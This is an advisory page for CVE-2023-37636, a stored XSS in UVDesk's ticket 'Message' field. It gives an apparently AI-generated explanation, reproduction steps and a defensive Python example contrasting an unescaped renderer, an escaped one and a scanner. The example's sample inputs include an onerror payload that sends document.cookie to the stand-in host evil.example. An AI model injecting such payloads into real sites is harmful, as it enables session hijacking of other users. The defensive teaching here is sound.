VYPR
Unrated severity · NVD Advisory · Published Oct 23, 2023 · Updated Sep 12, 2024

CVE-2023-37636

Description

A stored cross-site scripting (XSS) vulnerability in UVDesk Community Skeleton v1.1.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Message field when creating a ticket.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products: 2

Patches: none listed (see "What the fix does" below)

Vulnerability mechanics

Root cause

"Missing input sanitization in the 'Message' field allows injection of arbitrary JavaScript code."

Attack vector

An attacker who is logged into the UVDesk Community Skeleton v1.1.1 application can place a malicious JavaScript payload in the "Message" input field when creating a ticket [ref_id=1]. The input is stored server-side without sanitization and later rendered without output encoding, so whenever any user (including other agents or administrators) views the ticket, the stored script executes in their browser with that user's session, which is what makes this a stored (persistent) XSS rather than a reflected one [ref_id=1].

Affected code

The vulnerability resides in the "Message" field of the ticket creation form. The affected endpoint is `http://localhost/uvdesk-community/public/en/member/ticket/save` and the affected POST parameter is `reply` (the form label "Message" and the parameter name differ) [ref_id=1]. The application neither sanitizes the user-supplied message before storing it nor encodes it when rendering the ticket view.

What the fix does

No patch is provided in the bundle. The advisory recommends implementing proper input validation and output encoding to prevent malicious code from being injected into the web application [ref_id=1]. Specifically, server-side validation should sanitize user input before it is stored in the database, and output encoding should ensure that any user input displayed on the web page is encoded for the context it lands in (HTML body, attribute, JavaScript, URL), so that it can never be parsed as markup or script [ref_id=1]. Of the two, context-aware output encoding at render time is the control that actually stops stored XSS; input sanitization is defense in depth, since stored data may be rendered in several places and contexts.
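The following is an added example, not code from the advisory or from the UVDesk project, that shows the defect class and the fix side by side: a hypothetical renderer that interpolates the stored message verbatim, the same renderer with HTML-context output encoding applied, and a small scanner that checks whether a rendered fragment still contains executable markup (`<script>` tags or `on*` event handlers). The wrapper markup, the sample messages and the function names are all assumptions made for the example; UVDesk itself is a PHP/Symfony application and its templates are not reproduced here.

```python
import html
from html.parser import HTMLParser
from typing import Tuple

# Constructed sample inputs standing in for what an attacker would type into the
# "Message" field (POST parameter `reply`). These are not the advisory's PoC payloads.
SAMPLE_MESSAGES = [
    "Printer on floor 2 is jammed again",                                # benign
    "<script>alert(document.cookie)</script>",                           # script tag
    '<img src=x onerror="fetch(\'//evil.example/\'+document.cookie)">',  # event handler
]

# Hypothetical wrapper markup for a ticket message (assumption, not UVDesk's template).
WRAPPER_OPEN = '<div class="ticket-message">'
WRAPPER_CLOSE = "</div>"


def render_ticket_vulnerable(message: str) -> str:
    """Interpolates the stored message verbatim: the defect class described in the advisory.

    Anything containing '<' becomes markup in the viewer's browser.
    """
    return f"{WRAPPER_OPEN}{message}{WRAPPER_CLOSE}"


def render_ticket_fixed(message: str) -> str:
    """Same rendering with HTML-context output encoding applied at render time.

    html.escape(quote=True) encodes <, >, &, " and ', so the message can only ever be
    text inside the element, never a new tag or attribute.
    """
    return f"{WRAPPER_OPEN}{html.escape(message, quote=True)}{WRAPPER_CLOSE}"


class _ActiveContentScanner(HTMLParser):
    """Counts markup that can execute script: <script> start tags and on* attributes."""

    def __init__(self) -> None:
        super().__init__()
        self.script_tags = 0
        self.event_handlers = 0

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.script_tags += 1
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.event_handlers += 1


def scan_for_active_content(rendered_html: str) -> Tuple[int, int]:
    """Return (script_tags, event_handlers) found in a rendered HTML fragment.

    Entity references such as &lt;script&gt; reach the parser as character data, not as
    a start tag, so a correctly encoded message scores (0, 0).
    """
    scanner = _ActiveContentScanner()
    scanner.feed(rendered_html)
    scanner.close()
    return scanner.script_tags, scanner.event_handlers


def is_message_inert(message: str, renderer=render_ticket_fixed) -> bool:
    """True if rendering `message` through `renderer` yields no executable markup."""
    return scan_for_active_content(renderer(message)) == (0, 0)


if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        vuln = scan_for_active_content(render_ticket_vulnerable(msg))
        fixed = scan_for_active_content(render_ticket_fixed(msg))
        print(f"{msg[:40]!r:45} vulnerable={vuln} fixed={fixed}")
```

The scanner is deliberately narrow: it only flags `<script>` elements and `on*` handler attributes, so it is a regression check for the encoding step, not a substitute for it. The same scanner can be fed the HTML of a real ticket page fetched after submitting a test message, which is a cheap way to confirm that a fix actually reaches the ticket view and not just the creation form.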

Preconditions

  • Auth: attacker must be logged into the UVDesk Community Skeleton application
  • Input: attacker must have access to the ticket creation functionality

Reproduction

Step-1: While logged in to the application, navigate to `http://localhost/uvdesk-community/public/en/member/tickets` and click on create ticket [ref_id=1]. Enter a JavaScript payload in the "Message" field (sent as the `reply` parameter to the `ticket/save` endpoint) and submit the ticket. The payload is stored unchanged and executes in the browser of any user who subsequently opens that ticket.

Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 1
